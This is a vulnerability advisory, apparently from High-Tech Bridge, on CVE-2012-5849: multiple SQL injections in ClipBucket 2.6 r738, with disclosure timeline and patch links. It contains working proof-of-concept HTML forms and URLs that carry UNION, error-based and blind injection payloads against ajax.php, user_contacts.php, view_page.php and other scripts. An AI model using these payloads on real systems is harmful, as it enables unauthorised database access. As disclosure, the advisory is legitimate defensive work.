ClipBucket version 2.6 revision 738 suffers from a remote SQL injection vulnerability.
Product: ClipBucket
Vendor: clip-bucket.com
Vulnerable Version(s): 2.6 Revision 738 and probably prior
Tested Version: 2.6 Revision 738
Vendor Notification: November 7, 2012
Vendor Patch: November 28, 2012
Public Disclosure: December 5, 2012
Vulnerability Type: SQL Injection [CWE-89]
CVE Reference: CVE-2012-5849
CVSSv2 Base Score: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
Solution Status: Fixed by Vendor
Risk Level: High
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )
-----------------------------------------------------------------------------------------------
Advisory Details:
High-Tech Bridge Security Research Lab discovered multiple vulnerabilities in ClipBucket, which can be exploited to perform SQL Injection attacks.
1) Multiple SQL Injections in ClipBucket: CVE-2012-5849
1.1 The vulnerability exists due to improper sanitation of input in multiple parameters within the "/ajax.php" script. A remote attacker can send a specially crafted HTTP POST request and execute arbitrary SQL queries in application’s database. The following parameter are vulnerable to SQL injection attacks:
- "uid" (when "mode" is set to "add_friend"). This vulnerability require that attacker is logged-in into the application, however new user registration is open by default ;
- "id" (when "mode" is set to "share_object" or "add_to_fav", and "type" is set to "video", "photo", or "collection");
- "id" (when "mode" is set to "rating" and "type" is set to "video", "photo", "collection", or "user"). This vulnerabilities require that attacker is logged-in into the application, however new user registration is open by default;
- "id" (when "mode" is set to "flag_object" and "type" is set to "video", "group", "user", "photo", or "collection");
- "cid" (when "mode" is set to "add_new_item" or "remove_collection_item" and "type" is set to "video" or "photo");
- "cid" (when "mode" is set to "remove_collection_item" and "type" is set to "videos" or "photos");
- "cid" (when "mode" is set to "get_item" or "load_more_items" and "type" is set to "videos" or "photos");
- "ci_id" (when "mode" is set to "get_item" and "type" is set to "videos" or "photos").
The following PoC (Proof-of-Concept) codes demonstrate the vulnerabilities.
PoC 1:
<form action="http://[host]/ajax.php" method="post">
<input type="hidden" name="mode" value="add_friend" />
<input type="hidden" name="uid" value="' UNION SELECT 1,2,3,4,5,6,7,version(),9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10 -- " />
<input type="submit" id="btn">
</form>
PoC 2:
<form action="http://[host]/ajax.php" method="post">
<input type="hidden" name="mode" value="get_item" />
<input type="hidden" name="type" value="[videos|photos]" />
<input type="hidden" name="cid" value="0 UNION SELECT 1,2,3,4,5,6,7,version(),9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9 -- " />
<input type="hidden" name="ci_id" value="" />
<input type="submit" id="btn">
</form>
PoC 3:
<form action="http://[host]/ajax.php" method="post">
<input type="hidden" name="mode" value="get_item" />
<input type="hidden" name="type" value="[videos|photos]" />
<input type="hidden" name="cid" value="" />
<input type="hidden" name="ci_id" value="0 UNION SELECT 1,2,3,4,5,6,7,version(),9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9 -- " />
<input type="submit" id="btn">
</form>
PoC 4:
<form action="http://[host]/ajax.php" method="post">
<input type="hidden" name="mode" value="load_more_items" />
<input type="hidden" name="type" value="[videos|photos]" />
<input type="hidden" name="cid" value="0' UNION SELECT 1,2,3,4,5,6,7,version(),9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9 -- " />
<input type="submit" id="btn">
</form>
The second type of PoC code uses error-based SQL injection technique to display SQL server version:
<form action="http://[host]/ajax.php" method="post">
<input type="hidden" name="mode" value="rating" />
<input type="hidden" name="type" value="[video|photo|collection|user]" />
<input type="hidden" name="rating" value="1" />
<input type="hidden" name="id" value="-1 OR 1=(select min(@a:=1)from (select 1 union select 2)k group by (select concat(@@version,0x0,@a:=(@a+1)%2))) -- " />
<input type="submit" id="btn">
</form>
The third PoC code demonstrates vulnerability exploitation by blind SQL injection technique:
<form action="http://[host]/ajax.php" method="post">
<input type="hidden" name="mode" value="share_object" />
<input type="hidden" name="type" value="video" />
<input type="hidden" name="id" value="0 OR version()>='5' -- " />
<input type="submit" id="btn">
</form>
If application uses MySQL server version 5 or greater, the result of the above-mentioned HTTP request will be a message saying: "You are not logged in" or "Please enter usernames or emails to send this video".
1.2 The vulnerability was discovered in the "/user_contacts.php" script while handling the "user" HTTP GET parameter. A remote attacker can inject and execute arbitrary SQL commands in application’s database.
The following PoC demonstrates the vulnerability:
http://[host]/user_contacts.php?user=0%27%20UNION%20SELECT%201,2,3,version%28%29,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10%20--%202
1.3 The vulnerability was discovered in the "/view_channel.php" script while handling the "user" HTTP GET parameter. A remote attacker can inject and execute arbitrary SQL commands in application’s database.
The following PoC demonstrates the vulnerability:
http://[host]/view_channel.php?user=0%27%20UNION%20SELECT%201,2,3,version%28%29,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10%20--%202
1.4 The vulnerability exists due to an error in the "view_page.php" script while handling the "pid" HTTP GET parameter. A remote attacker can inject and execute arbitrary SQL commands in application’s database.
The following PoC demonstrates the vulnerability:
http://[host]/view_page.php?pid=0%27%20UNION%20SELECT%201,2,3,4,5,version%28%29,7,8,9,10%20--%202
1.5 The vulnerability was discovered in the "view_topic.php" script while handling the "tid" HTTP GET parameter. A remote attacker can inject and execute arbitrary SQL commands in application’s database.
The following PoC demonstrates the vulnerability:
http://[host]/view_topic.php?tid=0%27%20UNION%20SELECT%201,version%28%29,3,4,5,6,7,8,9,10,11,12%20--%202
1.6 The vulnerability was discovered in the "/watch_video.php" script while handling the "v" HTTP GET parameter. A remote attacker can inject and execute arbitrary SQL commands in application’s database.
Notice: some of the above-mentioned vulnerabilities were described in Secunia Advisory https://secunia.com/advisories/47474/ for the previous versions of ClipBucket, however they were not fixed in the tested version.
-----------------------------------------------------------------------------------------------
Solution:
Apply CB SQL Injection Fix 11282012 patch or upgrade to ClipBucket 2.6 r738 with security fixes (clipbucket-2.6-r738-security-fixed-p2).
More Information:
http://forums.clip-bucket.com/showthread.php?12527-Security-Fix-ClipBucket-2-6-SQL-Injections-fix-%28Updated%29
http://sourceforge.net/projects/clipbucket/files/Patches/
http://sourceforge.net/projects/clipbucket/files/ClipBucket%20v2/
-----------------------------------------------------------------------------------------------
# 0day.today [2018-02-15] #